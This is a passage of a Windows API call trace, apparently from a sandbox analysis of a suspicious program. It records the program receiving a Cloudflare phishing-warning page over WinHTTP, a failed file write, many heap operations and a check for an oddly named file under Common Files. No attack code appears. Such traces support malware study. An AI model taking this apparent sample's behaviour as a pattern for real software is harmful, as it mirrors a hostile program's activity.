\n\n \n\n\n\n", cchWideChar=4050, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4050 [0273.502] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xfd2) returned 0xf45e40 [0273.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", cchWideChar=4050, lpMultiByteStr=0xf45e40, cbMultiByte=4050, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", lpUsedDefaultChar=0x0) returned 4050 [0273.502] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe79850 | out: hHeap=0xcc0000) returned 1 [0273.503] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xfe0) returned 0xf4bd60 [0273.503] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf45e40 | out: hHeap=0xcc0000) returned 1 [0273.503] GetLastError () returned 0x0 [0273.503] SetLastError (dwErrCode=0x0) [0273.503] GetLastError () returned 0x0 [0273.503] SetLastError (dwErrCode=0x0) [0273.503] WriteFile (in: hFile=0xfffffffe, lpBuffer=0xd03ff8, nNumberOfBytesToWrite=0xfd1, lpNumberOfBytesWritten=0x8ddbc0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x8ddbc0, lpOverlapped=0x0) returned 0 [0273.503] GetLastError () returned 0x6 [0273.503] GetLastError () returned 0x6 [0273.503] SetLastError (dwErrCode=0x6) [0273.503] GetLastError () returned 0x6 [0273.503] SetLastError (dwErrCode=0x6) [0273.503] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf4bd60 | out: hHeap=0xcc0000) returned 1 [0273.503] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85950 | out: hHeap=0xcc0000) returned 1 [0273.503] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe79820 | out: hHeap=0xcc0000) returned 1 [0273.503] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddb620 | out: hHeap=0xcc0000) returned 1 [0273.503] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee6390 | out: hHeap=0xcc0000) returned 1 [0273.503] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0273.504] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfb0d8 | out: hHeap=0xcc0000) returned 1 [0273.504] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd26d50 | out: hHeap=0xcc0000) returned 1 [0273.504] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01928 | out: hHeap=0xcc0000) returned 1 [0273.504] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9ac0 | out: hHeap=0xcc0000) returned 1 [0273.504] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda660 | out: hHeap=0xcc0000) returned 1 [0273.504] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9b08 | out: hHeap=0xcc0000) returned 1 [0273.504] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01988 | out: hHeap=0xcc0000) returned 1 [0273.504] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfe050 | out: hHeap=0xcc0000) returned 1 [0273.504] WinHttpRequest:IUnknown:Release (This=0xd0dc30) returned 0x0 [0273.505] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfb120 | out: hHeap=0xcc0000) returned 1 [0273.505] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda498 | out: hHeap=0xcc0000) returned 1 [0273.505] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9af0 | out: hHeap=0xcc0000) returned 1 [0273.505] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9dd8 | out: hHeap=0xcc0000) returned 1 [0273.505] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd018c8 | out: hHeap=0xcc0000) returned 1 [0273.505] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfe230 | out: hHeap=0xcc0000) returned 1 [0273.505] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd01958 | out: hHeap=0xcc0000) returned 1 [0273.505] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda600 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9b20 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda630 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9d00 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda6c0 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda6a8 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9bc8 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9dc0 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda6d8 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfb048 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda6f0 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddf388 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9d48 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda648 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfe078 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd018d8 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfe190 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf49da8 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe858c0 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe79838 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe79ad8 | out: hHeap=0xcc0000) returned 1 [0273.506] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee6368 | out: hHeap=0xcc0000) returned 1 [0273.507] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85930 | out: hHeap=0xcc0000) returned 1 [0273.507] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee5ee0 | out: hHeap=0xcc0000) returned 1 [0273.507] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9ce8 | out: hHeap=0xcc0000) returned 1 [0273.507] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.507] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85930 [0273.507] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee5ee0 [0273.507] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9ce8 [0273.507] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe858c0 [0273.507] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda648 [0273.507] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe858c0 | out: hHeap=0xcc0000) returned 1 [0273.507] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x16) returned 0xde6780 [0273.507] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe858c0 [0273.507] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9d48 [0273.507] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85910 [0273.507] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6368 [0273.507] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85950 [0273.507] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x44) returned 0xef4850 [0273.507] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4c) returned 0xec8a78 [0273.507] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee62a0 [0273.507] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda6f0 [0273.507] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe858f0 [0273.507] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda6f0 | out: hHeap=0xcc0000) returned 1 [0273.507] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee60e8 [0273.507] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xdda6f0 [0273.508] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee6368 | out: hHeap=0xcc0000) returned 1 [0273.508] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85950 | out: hHeap=0xcc0000) returned 1 [0273.508] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9d48 | out: hHeap=0xcc0000) returned 1 [0273.508] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6368 [0273.508] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9d48 [0273.508] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85950 [0273.508] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85920 [0273.508] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85920 | out: hHeap=0xcc0000) returned 1 [0273.508] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6098 [0273.508] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda6d8 [0273.508] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85920 [0273.508] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85960 [0273.508] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9dc0 [0273.508] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85920 | out: hHeap=0xcc0000) returned 1 [0273.508] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9bc8 [0273.508] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85920 [0273.508] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85900 [0273.508] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda6a8 [0273.508] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85920 | out: hHeap=0xcc0000) returned 1 [0273.508] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda6c0 [0273.508] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85920 [0273.508] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe858d0 [0273.508] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9d00 [0273.508] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85920 | out: hHeap=0xcc0000) returned 1 [0273.508] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda630 [0273.508] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85920 [0273.509] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85940 [0273.509] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9b20 [0273.509] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85920 | out: hHeap=0xcc0000) returned 1 [0273.509] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda600 [0273.509] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85920 [0273.509] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85970 [0273.509] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9dd8 [0273.509] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85920 | out: hHeap=0xcc0000) returned 1 [0273.509] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9af0 [0273.509] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85920 [0273.509] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85980 [0273.509] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda498 [0273.509] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85920 | out: hHeap=0xcc0000) returned 1 [0273.509] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda318 [0273.509] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85920 [0273.509] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85990 [0273.509] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda450 [0273.509] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85920 | out: hHeap=0xcc0000) returned 1 [0273.509] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xddaa20 [0273.509] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85920 [0273.509] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe859a0 [0273.509] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda2e8 [0273.509] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85920 | out: hHeap=0xcc0000) returned 1 [0273.509] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xcfb048 [0273.509] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee6098 | out: hHeap=0xcc0000) returned 1 [0273.509] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda270 [0273.510] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85920 [0273.510] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe859b0 [0273.510] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3f0 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85920 | out: hHeap=0xcc0000) returned 1 [0273.510] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda2b8 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9d48 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85950 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda6d8 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9dc0 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85960 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9bc8 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda6a8 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85900 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda6c0 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9d00 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe858d0 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda630 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9b20 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85940 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda600 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9dd8 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85970 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9af0 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda498 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85980 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda318 | out: hHeap=0xcc0000) returned 1 [0273.510] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda450 | out: hHeap=0xcc0000) returned 1 [0273.511] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85990 | out: hHeap=0xcc0000) returned 1 [0273.511] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddaa20 | out: hHeap=0xcc0000) returned 1 [0273.511] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda2e8 | out: hHeap=0xcc0000) returned 1 [0273.511] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe859a0 | out: hHeap=0xcc0000) returned 1 [0273.511] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda270 | out: hHeap=0xcc0000) returned 1 [0273.511] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3f0 | out: hHeap=0xcc0000) returned 1 [0273.511] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe859b0 | out: hHeap=0xcc0000) returned 1 [0273.511] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda2b8 | out: hHeap=0xcc0000) returned 1 [0273.511] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xcfb048 | out: hHeap=0xcc0000) returned 1 [0273.511] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda6f0 | out: hHeap=0xcc0000) returned 1 [0273.511] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee6368 | out: hHeap=0xcc0000) returned 1 [0273.511] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85910 | out: hHeap=0xcc0000) returned 1 [0273.511] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda6f0 [0273.511] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda648 | out: hHeap=0xcc0000) returned 1 [0273.511] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9ce8 | out: hHeap=0xcc0000) returned 1 [0273.511] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee5ee0 | out: hHeap=0xcc0000) returned 1 [0273.511] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85930 | out: hHeap=0xcc0000) returned 1 [0273.511] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee5ee0 [0273.511] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9ce8 [0273.511] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85930 [0273.511] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9ce8 | out: hHeap=0xcc0000) returned 1 [0273.511] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6368 [0273.511] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9ce8 [0273.511] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda648 [0273.511] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda6f0 | out: hHeap=0xcc0000) returned 1 [0273.511] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.511] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85910 [0273.512] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe859b0 [0273.512] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6098 [0273.512] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda6f0 [0273.512] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe859a0 [0273.512] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda2b8 [0273.512] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85990 [0273.512] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xde66e0 [0273.512] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3f0 [0273.512] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85980 [0273.512] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddf388 [0273.512] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3f0 | out: hHeap=0xcc0000) returned 1 [0273.512] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3f0 [0273.512] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x80) returned 0xd26cc8 [0273.512] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddf388 | out: hHeap=0xcc0000) returned 1 [0273.512] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3f0 | out: hHeap=0xcc0000) returned 1 [0273.512] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3f0 [0273.512] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3f0 | out: hHeap=0xcc0000) returned 1 [0273.512] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xde66e0 | out: hHeap=0xcc0000) returned 1 [0273.512] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85990 | out: hHeap=0xcc0000) returned 1 [0273.512] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe859a0 | out: hHeap=0xcc0000) returned 1 [0273.512] GetFileAttributesW (lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370" (normalized: "c:\\progra~2\\common~1\\26207383702620738370")) returned 0x20 [0273.512] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd26cc8 | out: hHeap=0xcc0000) returned 1 [0273.513] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85980 | out: hHeap=0xcc0000) returned 1 [0273.513] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda2b8 | out: hHeap=0xcc0000) returned 1 [0273.513] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda6f0 | out: hHeap=0xcc0000) returned 1 [0273.513] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee6098 | out: hHeap=0xcc0000) returned 1 [0273.513] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe859b0 | out: hHeap=0xcc0000) returned 1 [0273.513] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85910 | out: hHeap=0xcc0000) returned 1 [0273.513] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf16728 [0273.513] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.513] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf16728 | out: hHeap=0xcc0000) returned 1 [0273.513] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.513] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6098 [0273.513] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda6f0 [0273.513] RtlAllocateHeap 